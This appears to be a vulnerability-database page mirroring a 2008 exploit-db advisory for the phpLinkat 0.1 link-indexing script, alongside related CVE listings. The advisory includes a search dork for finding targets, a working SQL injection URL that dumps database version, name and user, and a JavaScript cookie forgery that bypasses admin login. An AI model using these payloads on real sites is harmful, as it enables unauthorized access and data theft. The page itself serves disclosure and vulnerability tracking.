Lucene search
+L

phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection

🗓️ 26 Jul 2008 00:00:00Reported by Encrypt3d.M!ndType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection vulnerability on MySQ

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-3406
26 Jul 200800:00
circl
circl
Circl
CVE-2008-3407
26 Jul 200800:00
circl
cve
CVE
CVE-2008-3406
31 Jul 200816:00
cve
cve
CVE
CVE-2008-3407
31 Jul 200816:00
cve
cvelist
Cvelist
CVE-2008-3406
31 Jul 200816:00
cvelist
cvelist
Cvelist
CVE-2008-3407
31 Jul 200816:00
cvelist
euvd
EUVD
EUVD-2008-3392
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-3393
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-3406
31 Jul 200816:41
nvd
nvd
NVD
CVE-2008-3407
31 Jul 200816:41
nvd
Rows per page
######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
#
# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit
#
# Founded By : Encrypt3d.M!nd
#              encrypt3d.blogspot.com
#
# Dork : "Powered by DesClub.com - phpLinkat"

# Description :

   phpLinkat is a free link indexing script written in PHP and
   runs on MySQL.This script is suffering a sql injection bug
   and insecure cookie handling.

# phpLinkat : Sql Injection Exploit
    PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*

# phpLinkat : Insecure Cookie Handling

  /admin/login2.php:
  6 : if( ($username == $cpusername) && ($password == $cppassword) ){
  7 :  setcookie("login","right");  <<< wtf!!
  8 :  echo <<<EOF
 Exploit:
  javascript:document.cookie = "login=right; path=/;";
  Then goto "phplinkat/admin/",and have fun ^_^

#End

# milw0rm.com [2008-07-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jul 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03053
49